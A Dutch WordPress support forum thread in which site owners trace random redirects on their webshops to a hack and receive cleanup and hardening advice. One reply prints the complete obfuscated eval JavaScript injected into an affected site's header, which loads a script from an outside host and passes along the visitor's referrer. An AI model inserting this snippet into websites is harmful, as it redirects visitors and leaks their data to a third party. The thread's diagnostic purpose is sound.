• Opgelost Rinaldoklein

    (@rinaldoklein)


    Goedendag,

    Soms gebeurt het dat als ik naar een pagina op mijn webshop ga dat er een totaal andere link geopend wordt.
    Dit is een link naar reclame van een ander bedrijf.
    Dit is natuurlijk niet de bedoeling!
    Ik heb akismet met een api sleutel geinstalleerd. Waar en hoe kan ik die url (die ik hier niet ga opgeven, omdat ik hem als spam identificeer) blokeren of rapporteren?

    Wie kan mij helpen?

13 reacties aan het bekijken - 1 tot 13 (van in totaal 13)
  • Hoi,

    Kan het zijn dat je dit alleen in een bepaalde browser hebt.

    Xander

    Thread starter Rinaldoklein

    (@rinaldoklein)

    Nee jammer genoeg niet! Zowel in IE als in Safari… Heb bijna alles al doorzocht maar kan nergens een onbekende code/ url vinden… Het gebeurt ook niet altijd maar zo nu en dan??

    Kun je hier de url naar je website plaatsen?

    Xander

    Thread starter Rinaldoklein

    (@rinaldoklein)

    Toch is het wel nuttig voor ons als je stuurt naar welke site je gestuurd wordt; is het een site geserveerd door een adnetwerk, of puur een malware website (en is dus je site geïnfecteerd?); wel handig om te weten.

    Hoi,

    Das niet best idd. Welke plugin heb je gebruikt voor je webshop? Heb je het menu (bovenin) zelf gemaakt, er zijn menu items die naar andere websites doorverwijzen en mensen die geen goede beveiliging op hun computer hebben die hebben een probleem.

    Ik zou beginnen met al je gebruikersnamen en wachtwoorden te veranderen. Zowel van WordPress als je ftp en hosting. En evt. contact opnemen met je provider. Meer zou ik nu ff niet kunnen bedenken.

    Xander

    Thread starter Rinaldoklein

    (@rinaldoklein)

    He xander,

    Die menu heb ik wat aangepast idd. Hoe kan ik zien dat menu items naar andere websites doorverwijzen?
    Ik ga straks al mijn wachtwoorden veranderen was ik sowieso al van plan. Ik hoop dat het helpt!

    De Url waar hij soms toe doorverwijst is: URL van ultimaterewards gamefevertv

    Bedankt voor de hulp alvast!

    Hallo, ik heb last van hetzelfde op mijn site.
    Ik zie een stukje java script op de site dat er verdacht uit ziet. Dat heb ik gekopieerd naar een file en die in mijn browser geladen. Als je die een aantal keren (typisch 10) refreshed gaat tie ten minste 1 keer uitcvoeren , er zit een random component in…

    Dat is de oorzaak van de redirect.

    Kijk eens of jij ook dat stuk java script het staan…

    script begint met”eval(function(p,a,c,k,e,r)”
    en eindigt met “floor|random|1000|script’.split(‘|’),0,{}));”

    Mijn vraag> hoe ben ik eraan gekomen en nog belangrijker, hoe kom ik eraf?

    hugo

    @hugo_koopmans, @rinaldoklein:
    De malicious code staat inderdaad op die website
    Gaat om het volgende stuk, het staat hoogstwaarschijnlijk in je header.php

    <script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'),0,{}));</script>

    Volgens mij wordt het tijd om dit te lezen:
    http://codex.wordpress.org/FAQ_My_site_was_hacked

    @richard, Roy dank voor jullie reacties, Ik heb de link van Roy bekeken maar dit is meer iets dat mijn provider zou moeten doen toch?(hij is er al mee bezig)

    Mijn vraag nu is is het genoeg om de code uit de header te halen of staat tie er de volgende dag dan gewoon weer in?

    Is wordpress net zo gevoelig voor hacks/virussen als windoos ?

    Zelf werk ik met linux maar ik hoor dat firefox (de browser dus) ook redelijk gevoelig begint te worden voor hacks?

    hugo

    Ik heb de link van Roy bekeken maar dit is meer iets dat mijn provider zou moeten doen toch?

    Nee hoor, 9 van de 10 keer is het probleem een WordPress uit de steentijd, slechte plugins of slechte wachtwoorden. Aan geen van al dit kan je provider iets doen.

    Mijn vraag nu is is het genoeg om de code uit de header te halen of staat tie er de volgende dag dan gewoon weer in?

    Dat ligt eraan wat voor hack het is, maar de code weghalen is hoogstwaarschijnlijk alleen het gevolg aanpakken en niet het probleem (je site die gehackt is), dus die kans is inderdaad groot. Lees het artikel waarnaar ik verwees nog maar eens, vooral de links over het opschonen van een site.

    Is wordpress net zo gevoelig voor hacks/virussen als windoos ?

    Nee hoor, we hebben al járen geen grote hacks meer gehad. Als je gewoon de laatste versie hebt draaien, niet zomaar elke plugin installeert en je logingegevens niet ‘admin’ en ‘welkom’ zijn, dan is de kans op een hack vrij klein. Bovendien kun je zelf nog vanalles extras doen:
    http://codex.wordpress.org/Hardening_WordPress

    Thread starter Rinaldoklein

    (@rinaldoklein)

    Hallo

    hartstikke bedankt! Ik heb alles gedaan wat er in die link stond en nu maar hopen dat de hack weg is.
    Ik heb geprobeerd erachter te komen hoe de hack tot stand is gekomen want had toch behoorlijk goede wachtwoorden en altijd alles up to date.
    Mss komt het door een plugin die ik aan het begin (toen ik nog niet zoveel verstand had) zat. Ik weet het niet en ben bang dat ik er nooit achter zal komen.
    Ik zal voortaan maandelijks mijn wachtwoorden veranderen ter voorkoming van herhaling.

    Nogmaals bedankt!

13 reacties aan het bekijken - 1 tot 13 (van in totaal 13)
  • Het onderwerp ‘Spam’ is gesloten voor nieuwe reacties.